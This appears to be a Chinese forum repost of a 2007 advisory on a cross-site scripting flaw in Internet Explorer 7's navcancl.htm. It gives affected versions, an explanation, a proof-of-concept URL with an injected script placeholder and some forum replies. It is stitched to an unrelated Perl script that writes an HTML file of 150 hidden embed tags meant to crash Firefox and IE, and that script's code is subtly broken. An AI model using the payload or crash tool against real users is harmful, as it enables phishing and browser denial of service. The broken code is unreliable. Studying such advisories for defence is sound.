Microsoft Internet Explorer NavCancel.HTM跨站脚本漏洞

uynetwork

影响版本:
Microsoft Internet Explorer 7.0
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
详细说明:
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer包含的navcancl.htm存在输入验证问题，远程攻击者可以利用漏洞进行跨站脚本攻击，可以获得敏感信息。

当特定页面取消时，页面URL会提供给navcancl.htm处理，类似res://ieframe.dll/navcancl.htm#[url]http://www.site.com[/url]，navcancl.htm然后在“Refresh the page.”中生成脚本，当用户点链接时重新装载提供的站点，但是由于输入验证问题，可导致插入恶意脚本到提供的链接中，然后在“Refresh the page.”操作时执行。虽然Internet Explorer现在很多本地资源(包括navcancl.htm)运行在“Internet Zone”中，可导致不能利用为代码执行。但是由于IE7的设计错误，浏览器会自动删除本地资源的URL路径，因此可以进行恶意页面的钓鱼攻击。


参考:
[url]http://www.securityfocus.com/archive/1/462833[/url]
解决方案:
目前没有解决方案提供：

[url]http://www.microsoft.com/ie/[/url]
测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!


res://ieframe.dll/navcancl.htm#[url]http://www.example.com/[/url][script]


//Sebug.net

yingou.qlj

我完美的IE7  
漏洞 ..
来了

Jason权权

[size=5][color=Red]哟 哟 哟 哟....[/color][/size]   [color=Blue][size=7]很FZ[/size][/color]

yingou.qlj

来源：转载  发布时间：2007-3-23 0:47:25


#!/usr/bin/perl
#wenping050.cnxhacker.net
print "\nFirefox,IE6,IE7 Crash File\n";
print "Music file:";chomp($musik=<STDIN>);
open(CRASH, ">./crash.html") or die "cannot create file\n";
print CRASH "<embed src="/$musik" autostart=true loop=true hidden=true height=0 width=0>" x 150;
close(JPG);
print "Done....safed to crash.html\n";